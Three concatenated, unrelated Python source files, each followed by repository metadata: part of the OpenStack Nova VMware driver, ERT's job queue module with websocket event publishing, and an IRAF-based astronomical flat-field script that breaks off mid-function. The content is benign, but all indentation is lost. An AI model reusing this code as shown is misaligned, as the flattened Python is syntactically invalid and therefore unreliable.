_vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info,
flavor=flavor)
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
"""Attach volume storage to VM instance."""
_volumeops = self._get_volumeops_for_compute_node(instance['node'])
return _volumeops.attach_volume(connection_info,
instance)
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
"""Detach volume storage to VM instance."""
_volumeops = self._get_volumeops_for_compute_node(instance['node'])
return _volumeops.detach_volume(connection_info,
instance)
def get_volume_connector(self, instance):
"""Return volume connector information."""
return self._volumeops.get_volume_connector(instance)
def get_host_ip_addr(self):
"""Returns the IP address of the vCenter host."""
return CONF.vmware.host_ip
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, image_id, update_task_state)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
"""Reboot VM instance."""
self._vmops.reboot(instance, network_info)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
"""Destroy VM instance."""
# Destroy gets triggered when Resource Claim in resource_tracker
# is not successful. When resource claim is not successful,
# node is not set in instance. Perform destroy only if node is set
if not instance['node']:
return
self._vmops.destroy(instance, destroy_disks)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def suspend(self, context, instance):
"""Suspend the specified instance."""
self._vmops.suspend(instance)
def resume(self, context, instance, network_info, block_device_info=None):
"""Resume the suspended VM instance."""
self._vmops.resume(instance)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Rescue the specified instance."""
self._vmops.rescue(context, instance, network_info, image_meta)
def unrescue(self, instance, network_info):
"""Unrescue the specified instance."""
self._vmops.unrescue(instance)
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance."""
# TODO(PhilDay): Add support for timeout (clean shutdown)
self._vmops.power_off(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
self._vmops.power_on(instance)
def poll_rebooting_instances(self, timeout, instances):
"""Poll for rebooting instances."""
self._vmops.poll_rebooting_instances(timeout, instances)
def get_info(self, instance):
"""Return info about the VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_diagnostics(instance)
def get_instance_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_instance_diagnostics(instance)
def host_power_action(self, action):
"""Host operations not supported by VC driver.
This needs to override the ESX driver implementation.
"""
raise NotImplementedError()
def host_maintenance_mode(self, host, mode):
"""Host operations not supported by VC driver.
This needs to override the ESX driver implementation.
"""
raise NotImplementedError()
def set_host_enabled(self, enabled):
"""Host operations not supported by VC driver.
This needs to override the ESX driver implementation.
"""
raise NotImplementedError()
def get_host_uptime(self):
"""Host uptime operation not supported by VC driver."""
msg = _("Multiple hosts may be managed by the VMWare "
"vCenter driver; therefore we do not return "
"uptime for just one host.")
raise NotImplementedError(msg)
def inject_network_info(self, instance, nw_info):
"""inject network info for specified instance."""
self._vmops.inject_network_info(instance, nw_info)
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
# Running instances per cluster
cluster_instances = {}
for instance in all_instances:
instances = cluster_instances.get(instance['node'])
if instances:
instances.append(instance)
else:
instances = [instance]
cluster_instances[instance['node']] = instances
# Invoke the image aging per cluster
for resource in self._resources.keys():
instances = cluster_instances.get(resource, [])
_vmops = self._get_vmops_for_compute_node(resource)
_vmops.manage_image_cache(context, instances)
def instance_exists(self, instance):
"""Efficient override of base instance_exists method."""
return self._vmops.instance_exists(instance)
def attach_interface(self, instance, image_meta, vif):
"""Attach an interface to the instance."""
self._vmops.attach_interface(instance, image_meta, vif)
def detach_interface(self, instance, vif):
"""Detach an interface from the instance."""
self._vmops.detach_interface(instance, vif)
class VMwareAPISession(api.VMwareAPISession):
"""Sets up a session with the VC/ESX host and handles all
the calls made to the host.
"""
def __init__(self, host_ip=CONF.vmware.host_ip,
host_port=CONF.vmware.host_port,
username=CONF.vmware.host_username,
password=CONF.vmware.host_password,
retry_count=CONF.vmware.api_retry_count,
scheme="https"):
super(VMwareAPISession, self).__init__(
host=host_ip,
port=host_port,
server_username=username,
server_password=password,
api_retry_count=retry_count,
task_poll_interval=CONF.vmware.task_poll_interval,
scheme=scheme,
create_session=True,
wsdl_loc=CONF.vmware.wsdl_location
)
def _is_vim_object(self, module):
"""Check if the module is a VIM Object instance."""
return isinstance(module, vim.Vim)
def _call_method(self, module, method, *args, **kwargs):
"""Calls a method within the module specified with
args provided.
"""
if not self._is_vim_object(module):
return self.invoke_api(module, method, self.vim, *args, **kwargs)
else:
return self.invoke_api(module, method, *args, **kwargs)
def _wait_for_task(self, task_ref):
"""Return a Deferred that will give the result of the given task.
The task is polled until it completes.
"""
return self.wait_for_task(task_ref)
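# Hedged usage sketch (illustrative comments, not part of the original
# module): _call_method() inserts self.vim as the first positional argument
# only when the target is a helper module rather than a Vim object, e.g.:
#
#   session = VMwareAPISession()
#   # helper module: the vim handle is supplied automatically
#   ext = session._call_method(vim_util, 'find_extension', extension_key)
#   # Vim object: invoked directly, no handle injected
#   content = session._call_method(session.vim, method_name, *args)
#
# (extension_key and method_name above are hypothetical placeholders.)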
|
affo/nova
|
nova/virt/vmwareapi/driver.py
|
Python
|
apache-2.0
| 27,905
|
# Copyright (C) 2011 Equinor ASA, Norway.
#
# The file 'job_queue.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
"""
Module implementing a queue for managing external jobs.
"""
import asyncio
import copy
import json
import logging
import time
import ssl
import typing
import websockets
from websockets.datastructures import Headers
from cloudevents.http import CloudEvent, to_json
from cwrap import BaseCClass
from job_runner import JOBS_FILE, CERT_FILE
from res import ResPrototype
from res.job_queue import JobQueueNode, JobStatusType, ThreadStatus
from res.job_queue.queue_differ import QueueDiffer
logger = logging.getLogger(__name__)
LONG_RUNNING_FACTOR = 1.25
_FM_STEP_FAILURE = "com.equinor.ert.forward_model_step.failure"
_FM_STEP_PENDING = "com.equinor.ert.forward_model_step.pending"
_FM_STEP_RUNNING = "com.equinor.ert.forward_model_step.running"
_FM_STEP_SUCCESS = "com.equinor.ert.forward_model_step.success"
_FM_STEP_UNKNOWN = "com.equinor.ert.forward_model_step.unknown"
_FM_STEP_WAITING = "com.equinor.ert.forward_model_step.waiting"
_queue_state_to_event_type_map = {
"JOB_QUEUE_NOT_ACTIVE": _FM_STEP_WAITING,
"JOB_QUEUE_WAITING": _FM_STEP_WAITING,
"JOB_QUEUE_SUBMITTED": _FM_STEP_WAITING,
"JOB_QUEUE_PENDING": _FM_STEP_PENDING,
"JOB_QUEUE_RUNNING": _FM_STEP_RUNNING,
"JOB_QUEUE_DONE": _FM_STEP_RUNNING,
"JOB_QUEUE_EXIT": _FM_STEP_RUNNING,
"JOB_QUEUE_IS_KILLED": _FM_STEP_FAILURE,
"JOB_QUEUE_DO_KILL": _FM_STEP_FAILURE,
"JOB_QUEUE_SUCCESS": _FM_STEP_SUCCESS,
"JOB_QUEUE_RUNNING_DONE_CALLBACK": _FM_STEP_RUNNING,
"JOB_QUEUE_RUNNING_EXIT_CALLBACK": _FM_STEP_RUNNING,
"JOB_QUEUE_STATUS_FAILURE": _FM_STEP_UNKNOWN,
"JOB_QUEUE_FAILED": _FM_STEP_FAILURE,
"JOB_QUEUE_DO_KILL_NODE_FAILURE": _FM_STEP_FAILURE,
"JOB_QUEUE_UNKNOWN": _FM_STEP_UNKNOWN,
}
def _queue_state_event_type(state):
return _queue_state_to_event_type_map[state]
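# For example, _queue_state_event_type("JOB_QUEUE_RUNNING") returns
# _FM_STEP_RUNNING, i.e. "com.equinor.ert.forward_model_step.running".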
class JobQueue(BaseCClass):
# If the queue is created with size == 0 that means that it will
# just grow as needed; for the queue layer to know when to exit
# you must call the function submit_complete() when you have no
# more jobs to submit.
#
    # If the number of jobs is known in advance you can create the
    # queue with a finite value for size; in that case it is not
    # necessary to explicitly inform the queue layer when all jobs
    # have been submitted.
TYPE_NAME = "job_queue"
_alloc = ResPrototype(
"void* job_queue_alloc( int , char* , char* , char* )", bind=False
)
_start_user_exit = ResPrototype("bool job_queue_start_user_exit( job_queue )")
_get_user_exit = ResPrototype("bool job_queue_get_user_exit( job_queue )")
_free = ResPrototype("void job_queue_free( job_queue )")
_set_max_job_duration = ResPrototype(
"void job_queue_set_max_job_duration( job_queue , int)"
)
_get_max_job_duration = ResPrototype(
"int job_queue_get_max_job_duration( job_queue )"
)
_set_driver = ResPrototype("void job_queue_set_driver( job_queue , void* )")
_kill_job = ResPrototype("bool job_queue_kill_job( job_queue , int )")
_run_jobs = ResPrototype("void job_queue_run_jobs_threaded(job_queue , int , bool)")
_iget_driver_data = ResPrototype(
"void* job_queue_iget_driver_data( job_queue , int)"
)
_num_running = ResPrototype("int job_queue_get_num_running( job_queue )")
_num_complete = ResPrototype("int job_queue_get_num_complete( job_queue )")
_num_waiting = ResPrototype("int job_queue_get_num_waiting( job_queue )")
_num_pending = ResPrototype("int job_queue_get_num_pending( job_queue )")
_is_running = ResPrototype("bool job_queue_is_running( job_queue )")
_submit_complete = ResPrototype("void job_queue_submit_complete( job_queue )")
_iget_sim_start = ResPrototype("time_t job_queue_iget_sim_start( job_queue , int)")
_get_active_size = ResPrototype("int job_queue_get_active_size( job_queue )")
_set_pause_on = ResPrototype("void job_queue_set_pause_on(job_queue)")
_set_pause_off = ResPrototype("void job_queue_set_pause_off(job_queue)")
_get_max_submit = ResPrototype("int job_queue_get_max_submit(job_queue)")
_get_job_status = ResPrototype(
"job_status_type_enum job_queue_iget_job_status(job_queue, int)"
)
_get_ok_file = ResPrototype("char* job_queue_get_ok_file(job_queue)")
_get_exit_file = ResPrototype("char* job_queue_get_exit_file(job_queue)")
_get_status_file = ResPrototype("char* job_queue_get_status_file(job_queue)")
_add_job = ResPrototype("int job_queue_add_job_node(job_queue, job_queue_node)")
def __repr__(self):
nrun, ncom, nwait, npend = (
self._num_running(),
self._num_complete(),
self._num_waiting(),
self._num_pending(),
)
isrun = "running" if self.isRunning() else "not running"
cnt = "%s, num_running=%d, num_complete=%d, num_waiting=%d, num_pending=%d, active=%d"
return self._create_repr(cnt % (isrun, nrun, ncom, nwait, npend, len(self)))
def __init__(self, driver, max_submit=2, size=0):
"""
Short doc...
The @max_submit argument says how many times the job be submitted (including a failure)
max_submit = 2: means that we can submit job once more
The @size argument is used to say how many jobs the queue will
run, in total.
size = 0: That means that you do not tell the queue in
advance how many jobs you have. The queue will just run
all the jobs you add, but you have to inform the queue in
some way that all jobs have been submitted. To achieve
this you should call the submit_complete() method when all
jobs have been submitted.#
size > 0: The queue will know exactly how many jobs to run,
and will continue until this number of jobs have completed
- it is not necessary to call the submit_complete() method
in this case.
"""
OK_file = "OK"
status_file = "STATUS"
exit_file = "ERROR"
self.job_list = []
self._stopped = False
c_ptr = self._alloc(max_submit, OK_file, status_file, exit_file)
super(JobQueue, self).__init__(c_ptr)
self.size = size
self.driver = driver
self._set_driver(driver.from_param(driver))
self._differ = QueueDiffer()
def kill_job(self, queue_index):
"""
        Will kill the job with the given @queue_index.
"""
self._kill_job(queue_index)
def start(self, blocking=False):
verbose = False
self._run_jobs(self.size, verbose)
def clear(self):
pass
def block_waiting(self):
"""
Will block as long as there are waiting jobs.
"""
        while self.num_waiting() > 0:
time.sleep(1)
def block(self):
"""
Will block as long as there are running jobs.
"""
        while self.isRunning():
time.sleep(1)
def submit_complete(self):
"""
Method to inform the queue that all jobs have been submitted.
If the queue has been created with size == 0 the queue has no
way of knowing when all jobs have completed; hence in that
case you must call the submit_complete() method when all jobs
have been submitted.
If you know in advance exactly how many jobs you will run that
should be specified with the size argument when creating the
queue, in that case it is not necessary to call the
submit_complete() method.
"""
self._submit_complete()
def isRunning(self):
return self._is_running()
def num_running(self):
return self._num_running()
def num_pending(self):
return self._num_pending()
def num_waiting(self):
return self._num_waiting()
def num_complete(self):
return self._num_complete()
def __getitem__(self, index):
idx = index
ls = len(self)
if idx < 0:
idx += ls
if 0 <= idx < ls:
return self._iget_driver_data(idx)
raise IndexError(
"index out of range, was: %d should be in [0, %d)" % (index, ls)
)
def exists(self, index):
return self[index]
def get_max_running(self):
return self.driver.get_max_running()
def set_max_running(self, max_running):
self.driver.set_max_running(max_running)
def get_max_job_duration(self):
return self._get_max_job_duration()
def set_max_job_duration(self, max_duration):
self._set_max_job_duration(max_duration)
@property
def max_submit(self):
return self._get_max_submit()
def killAllJobs(self):
# The queue will not set the user_exit flag before the
# queue is in a running state. If the queue does not
# change to running state within a timeout the C function
# will return False, and that False value is just passed
# along.
user_exit = self._start_user_exit()
if user_exit:
while self.isRunning():
time.sleep(0.1)
return True
else:
return False
def igetSimStart(self, job_index):
return self._iget_sim_start(self, job_index)
def getUserExit(self):
        # Will check if a user_exit has been initiated on the job. The
# queue can be queried about this status until a
# job_queue_reset() call is invoked, and that should not be
# done before the queue is recycled to run another batch of
# simulations.
return self._get_user_exit()
def set_pause_on(self):
self._set_pause_on()
def set_pause_off(self):
self._set_pause_off()
def free(self):
self._free()
def __len__(self):
return self._get_active_size()
def getJobStatus(self, job_number):
"""@rtype: JobStatusType"""
return self._get_job_status(job_number)
def did_job_time_out(self, job_number):
return self.job_list[job_number].timed_out
def is_active(self):
for job in self.job_list:
if (
job.thread_status == ThreadStatus.READY
or job.thread_status == ThreadStatus.RUNNING
or job.thread_status == ThreadStatus.STOPPING
):
return True
return False
def fetch_next_waiting(self):
for job in self.job_list:
if job.thread_status == ThreadStatus.READY:
return job
return None
def count_status(self, status):
return len([job for job in self.job_list if job.status == status])
@property
def stopped(self):
return self._stopped
def kill_all_jobs(self):
self._stopped = True
@property
def queue_size(self):
return len(self.job_list)
@property
def ok_file(self):
return self._get_ok_file()
@property
def exit_file(self):
return self._get_exit_file()
@property
def status_file(self):
return self._get_status_file()
def add_job(self, job, iens):
job.convertToCReference(None)
queue_index = self._add_job(job)
self.job_list.append(job)
self._differ.add_state(queue_index, iens, job.status.value)
return queue_index
def count_running(self):
return sum(job.thread_status == ThreadStatus.RUNNING for job in self.job_list)
def max_running(self):
if self.get_max_running() == 0:
return len(self.job_list)
else:
return self.get_max_running()
def available_capacity(self):
return not self.stopped and self.count_running() < self.max_running()
def stop_jobs(self):
for job in self.job_list:
job.stop()
while self.is_active():
time.sleep(1)
async def stop_jobs_async(self):
for job in self.job_list:
job.stop()
while self.is_active():
await asyncio.sleep(1)
def assert_complete(self):
for job in self.job_list:
if job.thread_status != ThreadStatus.DONE:
msg = "Unexpected job status type after running job: {} with thread status: {}"
raise AssertionError(msg.format(job.status, job.thread_status))
def launch_jobs(self, pool_sema):
# Start waiting jobs
while self.available_capacity():
job = self.fetch_next_waiting()
if job is None:
break
job.run(
driver=self.driver,
pool_sema=pool_sema,
max_submit=self.max_submit,
)
def execute_queue(self, pool_sema, evaluators):
while self.is_active() and not self.stopped:
self.launch_jobs(pool_sema)
time.sleep(1)
if evaluators is not None:
for func in evaluators:
func()
if self.stopped:
self.stop_jobs()
self.assert_complete()
@staticmethod
def _translate_change_to_cloudevent(ee_id, real_id, status):
return CloudEvent(
{
"type": _queue_state_event_type(status),
"source": f"/ert/ee/{ee_id}/real/{real_id}/step/{0}",
"datacontenttype": "application/json",
},
{
"queue_event_type": status,
},
)
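    # Illustrative shape of the event built above (comment only, not in the
    # original): for ee_id="ee0", real_id=3, status="JOB_QUEUE_RUNNING" the
    # CloudEvent has type "com.equinor.ert.forward_model_step.running",
    # source "/ert/ee/ee0/real/3/step/0" and data
    # {"queue_event_type": "JOB_QUEUE_RUNNING"}.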
@staticmethod
async def _publish_changes(ee_id, changes, websocket):
events = [
JobQueue._translate_change_to_cloudevent(ee_id, real_id, status)
for real_id, status in changes.items()
]
for event in events:
await websocket.send(to_json(event))
async def execute_queue_async(
self, ws_uri, ee_id, pool_sema, evaluators, cert=None, token=None
):
if cert is not None:
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ssl_context.load_verify_locations(cadata=cert)
else:
ssl_context = True if ws_uri.startswith("wss") else None
headers = Headers()
if token is not None:
headers["token"] = token
async with websockets.connect(
ws_uri, ssl=ssl_context, extra_headers=headers
) as websocket:
await JobQueue._publish_changes(ee_id, self._differ.snapshot(), websocket)
try:
while True:
self.launch_jobs(pool_sema)
await asyncio.sleep(1)
if evaluators is not None:
for func in evaluators:
func()
await JobQueue._publish_changes(
ee_id, self.changes_after_transition(), websocket
)
if not self.is_active() or self.stopped:
break
except asyncio.CancelledError:
if self.stopped:
logger.debug(
"observed that the queue had stopped after cancellation, stopping jobs..."
)
self.stop_jobs()
logger.debug("jobs now stopped (after cancellation)")
raise
if self.stopped:
logger.debug("observed that the queue had stopped, stopping jobs...")
await self.stop_jobs_async()
logger.debug("jobs now stopped")
self.assert_complete()
self._differ.transition(self.job_list)
await JobQueue._publish_changes(ee_id, self._differ.snapshot(), websocket)
def add_job_from_run_arg(self, run_arg, res_config, max_runtime, ok_cb, exit_cb):
job_name = run_arg.job_name
run_path = run_arg.runpath
job_script = res_config.queue_config.job_script
num_cpu = res_config.queue_config.num_cpu
if num_cpu == 0:
num_cpu = res_config.ecl_config.num_cpu
job = JobQueueNode(
job_script=job_script,
job_name=job_name,
run_path=run_path,
num_cpu=num_cpu,
status_file=self.status_file,
ok_file=self.ok_file,
exit_file=self.exit_file,
done_callback_function=ok_cb,
exit_callback_function=exit_cb,
callback_arguments=[run_arg, res_config],
max_runtime=max_runtime,
)
if job is None:
return
run_arg._set_queue_index(self.add_job(job, run_arg.iens))
def add_ee_stage(self, stage, callback_timeout=None):
job = JobQueueNode(
job_script=stage.get_job_script(),
job_name=stage.get_job_name(),
run_path=stage.get_run_path(),
num_cpu=stage.get_num_cpu(),
status_file=self.status_file,
ok_file=self.ok_file,
exit_file=self.exit_file,
done_callback_function=stage.get_done_callback(),
exit_callback_function=stage.get_exit_callback(),
callback_arguments=stage.get_callback_arguments(),
max_runtime=stage.get_max_runtime(),
callback_timeout=callback_timeout,
)
if job is None:
raise ValueError("JobQueueNode constructor created None job")
iens = stage.get_run_arg().iens
stage.get_run_arg()._set_queue_index(self.add_job(job, iens))
def stop_long_running_jobs(self, minimum_required_realizations):
finished_realizations = self.count_status(JobStatusType.JOB_QUEUE_DONE)
if finished_realizations < minimum_required_realizations:
return
completed_jobs = [
job for job in self.job_list if job.status == JobStatusType.JOB_QUEUE_DONE
]
average_runtime = sum([job.runtime for job in completed_jobs]) / float(
len(completed_jobs)
)
for job in self.job_list:
if job.runtime > LONG_RUNNING_FACTOR * average_runtime:
job.stop()
def snapshot(self) -> typing.Optional[typing.Dict[int, str]]:
"""Return the whole state, or None if there was no snapshot."""
return self._differ.snapshot()
def changes_after_transition(self) -> typing.Dict[int, str]:
old_state, new_state = self._differ.transition(self.job_list)
return self._differ.diff_states(old_state, new_state)
def add_ensemble_evaluator_information_to_jobs_file(
self, ee_id, dispatch_url, cert, token
):
for q_index, q_node in enumerate(self.job_list):
if cert is not None:
cert_path = f"{q_node.run_path}/{CERT_FILE}"
with open(cert_path, "w") as cert_file:
cert_file.write(cert)
with open(f"{q_node.run_path}/{JOBS_FILE}", "r+") as jobs_file:
data = json.load(jobs_file)
data["ee_id"] = ee_id
data["real_id"] = self._differ.qindex_to_iens(q_index)
data["step_id"] = 0
data["dispatch_url"] = dispatch_url
data["ee_token"] = token
data["ee_cert_path"] = cert_path if cert is not None else None
jobs_file.seek(0)
jobs_file.truncate()
json.dump(data, jobs_file, indent=4)
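# Hedged usage sketch (illustrative comments, not part of the original
# file): with size == 0 the queue must be told explicitly when submission
# is finished, as described in the JobQueue docstrings above:
#
#   queue = JobQueue(driver, max_submit=2, size=0)
#   for node, iens in runnable_nodes:   # hypothetical (JobQueueNode, iens) pairs
#       queue.add_job(node, iens)
#   queue.submit_complete()             # required because size == 0
#   queue.start()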
|
joakim-hove/ert
|
res/job_queue/queue.py
|
Python
|
gpl-3.0
| 20,103
|
def makeflat(lista):
# print "LOGX:: Entering `makeflat` method/function in %(__file__)s" %
# globals()
flat = ''
import datetime
import glob
import os
import ntt
from ntt.util import readhdr, readkey3, delete, name_duplicate, updateheader, correctcard
from pyraf import iraf
iraf.images(_doprint=0, Stdout=0)
iraf.imutil(_doprint=0, Stdout=0)
iraf.imgeom(_doprint=0, Stdout=0)
# iraf.blkavg(_doprint=0, Stdout=0)
iraf.noao(_doprint=0, Stdout=0)
iraf.imred(_doprint=0, Stdout=0)
iraf.generic(_doprint=0, Stdout=0)
toforget = ['imgeom.blkavg', 'imutil.imarith',
'immatch.imcombine', 'noao.imred']
for t in toforget:
iraf.unlearn(t)
    MJDtoday = 55927 + (datetime.date.today() - datetime.date(2012, 1, 1)).days
_date = readkey3(readhdr(lista[0]), 'date-night')
_filter = readkey3(readhdr(lista[0]), 'filter')
output = name_duplicate(
lista[3], 'flat_' + str(_date) + '_' + str(_filter) + '_' + str(MJDtoday), '')
if os.path.isfile(output):
        answ = raw_input('file already produced, do again [y/[n]] ? ')
if not answ:
answ = 'n'
else:
answ = 'y'
if answ in ['yes', 'y', 'YES', 'Y', 'Yes']:
delete("temp_off.fits,temp_off_mask.fits,temp_on_mask.fits,temp_on.fits")
iraf.image.immatch.imcombine(
lista[0] + ',' + lista[7], output="temp_off.fits")
iraf.image.immatch.imcombine(
lista[1] + ',' + lista[6], output="temp_off_mask.fits")
iraf.image.immatch.imcombine(
lista[2] + ',' + lista[5], output="temp_on_mask.fits")
iraf.image.immatch.imcombine(
lista[3] + ',' + lista[4], output="temp_on.fits")
        # create the bias correction for the flat-on according to the
        # Lidman technique
delete("temp_onA.fits,temp_onC.fits,temp_onB.fits,temp_onAC.fits,temp_onACB.fits,temp_onACB_2D.fits")
delete("temp_on_bias.fits")
iraf.imgeom.blkavg(
input="temp_on.fits[500:600,*]", output="temp_onA.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_on_mask.fits[500:600,*]", output="temp_onC.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_on_mask.fits[50:150,*]", output="temp_onB.fits", option="average", b1=101, b2=1)
iraf.imutil.imarith("temp_onA.fits", "-",
"temp_onC.fits", "temp_onAC.fits")
iraf.imutil.imarith("temp_onAC.fits", "+",
"temp_onB.fits", "temp_onACB.fits")
iraf.imgeom.blkrep(input="temp_onACB.fits",
output="temp_onACB_2D.fits", b1=1024, b2=1)
iraf.imutil.imarith("temp_on.fits", "-",
"temp_onACB_2D.fits", "temp_on_bias.fits")
# same as above for the flat-off
delete("temp_offA.fits,temp_offC.fits,temp_offB.fits,temp_offAC.fits,temp_offACB.fits,temp_offACB_2D.fits")
delete("temp_off_bias.fits")
iraf.imgeom.blkavg(
input="temp_off.fits[500:600,*]", output="temp_offA.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_off_mask.fits[500:600,*]", output="temp_offC.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_off_mask.fits[50:150,*]", output="temp_offB.fits", option="average", b1=101, b2=1)
iraf.imutil.imarith("temp_offA.fits", "-",
"temp_offC.fits", "temp_offAC.fits")
iraf.imutil.imarith("temp_offAC.fits", "+",
"temp_offB.fits", "temp_offACB.fits")
iraf.imgeom.blkrep(input="temp_offACB.fits",
output="temp_offACB_2D.fits", b1=1024, b2=1)
iraf.imutil.imarith("temp_off.fits", "-",
"temp_offACB_2D.fits", "temp_off_bias.fits")
# create the corrected flat-field
# output=name_duplicate("temp_on_bias.fits",'flat_'+str(_date)+'_'+str(_filter)+'_'+str(MJDtoday),'')
output = name_duplicate(
lista[3], 'flat_' + str(_date) + '_' + str(_filter) + '_' + str(MJDtoday), '')
# print lista[0],'flat_'+str(_date)+'_'+str(_filter)+'_'+str(MJDtoday)
delete(output)
iraf.imutil.imarith("temp_on_bias.fits", "-",
"temp_off_bias.fits", output)
iraf.noao.imred.generic.normalize(output) # normalize the flat-field
correctcard(output)
delete("temp_on*.fits") # delete the temporary images
delete("temp_off*.fits")
print 'flat -> ' + str(output)
else:
print 'skip redoing the flat'
return output
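# Illustrative summary of the bias correction above (comments only, not in
# the original): for each lamp state the script column-averages a strip of
# the frame (blkavg over columns 500:600), subtracts the matching strip of
# the mask frame, adds back a reference strip of the mask frame (columns
# 50:150), replicates the resulting profile back to a 1024-wide image
# (blkrep), and subtracts that from the frame:
#   on_bias  = on  - blkrep(avg(on[500:600])  - avg(on_mask[500:600])
#                           + avg(on_mask[50:150]))
#   off_bias = off - blkrep(avg(off[500:600]) - avg(off_mask[500:600])
#                           + avg(off_mask[50:150]))
# The final flat is then normalize(on_bias - off_bias).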
def makeillumination(lista,flatfield):#,outputfile,illum_frame):
import os,glob,string,re
from astropy.io import fits as pyfits
import ntt
from ntt.util import readhdr, readkey3, delete, display_image, defsex, name_duplicate, correctcard
from numpy import compress, array, argmax, argmin, min, argsort, float32
import datetime
    MJDtoday = 55927 + (datetime.date.today() - datetime.date(2012, 1, 1)).days
_date = readkey3(readhdr(lista[0]), 'date-night')
_filter = readkey3(readhdr(lista[0]), 'filter')
illum_frame = name_duplicate(
lista[0], 'illum_' + _date + '_' + _filter + '_' + str(MJDtoday), '')
from pyraf import iraf
iraf.images(_doprint=0, Stdout=0)
iraf.imutil(_doprint=0, Stdout=0)
iraf.utilities(_doprint=0, Stdout=0)
iraf.noao(_doprint=0, Stdout=0)
iraf.imred(_doprint=0, Stdout=0)
iraf.ccdred(_doprint=0, Stdout=0)
iraf.digiphot(_doprint=0, Stdout=0)
iraf.daophot(_doprint=0, Stdout=0)
iraf.generic(_doprint=0, Stdout=0)
toforget = ['digiphot.daophot', 'imutil.imarith',
'image', 'utilities.surfit']
for t in toforget:
iraf.unlearn(t)
n = len(lista)
# start loop to read image names from the input file
lista1 = []
iraf.ccdred.verbose = 'no'
ff = open('templist.lst', 'w')
for i in range(0, len(lista)):
ff.write('C' + lista[i] + '\n')
delete('C' + lista[i])
delete('C' + re.sub('.fits', '_sub.fits', lista[i]))
ntt.sofiphotredudef.crosstalk(lista[i], 'C' + lista[i])
iraf.noao.imred.ccdred.ccdproc('C' + lista[i], output='', overscan="no", trim="yes", ccdtype='', darkcor='no', fixpix='no', zerocor="no", flatcor='yes',
illumco='no', trimsec='[1:1024,1:1007]', biassec='', flat=flatfield, illum='')
correctcard('C' + lista[i])
lista1.append('C' + lista[i])
ff.close()
print '\n### prereducing STD frames to compute illumination correction ........'
lista2, skyfile = ntt.sofiphotredudef.skysub(lista1, readkey3(
readhdr(lista1[0]), 'ron'), readkey3(readhdr(lista1[0]), 'gain'), True)
lista2 = ntt.sofiphotredudef.sortbyJD(lista2)
print '\n### use x on the star and q to continue....'
display_image(lista2[0], 2, '', '', False)
delete('tmpone.coo')
iraf.image.tv.imexamine(lista2[0], 2, logfile='tmpone.coo',
keeplog='yes', xformat='', yformat='', wcs='logical')
iraf.tvmark(2, 'tmpone.coo', mark="circle", number='yes',
label='no', radii=8, nxoffse=5, nyoffse=5, color=204, txsize=2)
xycoo = iraf.proto.fields('tmpone.coo', '1,2', Stdout=1)
x0, y0 = string.split(xycoo[0])
x0 = float(x0)
y0 = float(y0)
xcum0 = readkey3(readhdr(lista2[0]), 'xcum')
ycum0 = readkey3(readhdr(lista2[0]), 'ycum')
iraf.digiphot(_doprint=0, Stdout=0)
iraf.daophot(_doprint=0, Stdout=0)
iraf.noao.digiphot.daophot.datapars.datamin = -1000
iraf.noao.digiphot.daophot.datapars.datamax = 60000
iraf.noao.digiphot.daophot.daopars.function = 'gauss'
iraf.noao.digiphot.daophot.photpars.zmag = 0
namesex = defsex('default.sex')
for i in range(0, len(lista2)):
j = i + 1
xcum = readkey3(readhdr(lista2[i]), 'xcum')
ycum = readkey3(readhdr(lista2[i]), 'ycum')
xx = x0 - xcum0 + xcum
yy = y0 - ycum0 + ycum
# sex objects
os.system('sex ' + lista2[i] + ' -c ' + namesex + '> _logsex')
delete('_logsex')
xpix = iraf.proto.fields('detections.cat', fields='2', Stdout=1)
ypix = iraf.proto.fields('detections.cat', fields='3', Stdout=1)
cm = iraf.proto.fields('detections.cat', fields='4', Stdout=1)
cm = compress((array(xpix) != ''), array(cm, float))
ypix = compress((array(xpix) != ''), array(ypix, float))
xpix = compress((array(xpix) != ''), array(xpix, float))
if len(xpix) > 300:
num = 300
else:
num = len(xpix) - 1
xpix = xpix[argsort(cm)][0:num]
ypix = ypix[argsort(cm)][0:num]
distance = (ypix - yy)**2 + (xpix - xx)**2
xx1, yy1 = xpix[argmin(distance)], ypix[argmin(distance)]
f = open('tmpone.coo', 'w')
f.write(str(xx1) + ' ' + str(yy1) + '\n')
f.close()
display_image(lista2[i], 1, '', '', False)
iraf.tvmark(1, 'tmpone.coo', mark="circle", number='yes',
label='no', radii=8, nxoffse=5, nyoffse=5, color=204, txsize=2)
answ = 'n'
while answ != 'y':
answ = raw_input('selected the right one [[y]/n] ?')
if not answ:
answ = 'y'
if answ in ['y', 'YES', 'yes', 'Y']:
print lista2[i]
delete('pippo.' + str(j) + '.mag')
gggg = iraf.digiphot.daophot.phot(
lista2[i], "tmpone.coo", output="pippo." + str(j) + ".mag", verify='no', interac='no', Stdout=1)
try:
float(string.split(gggg[0])[3])
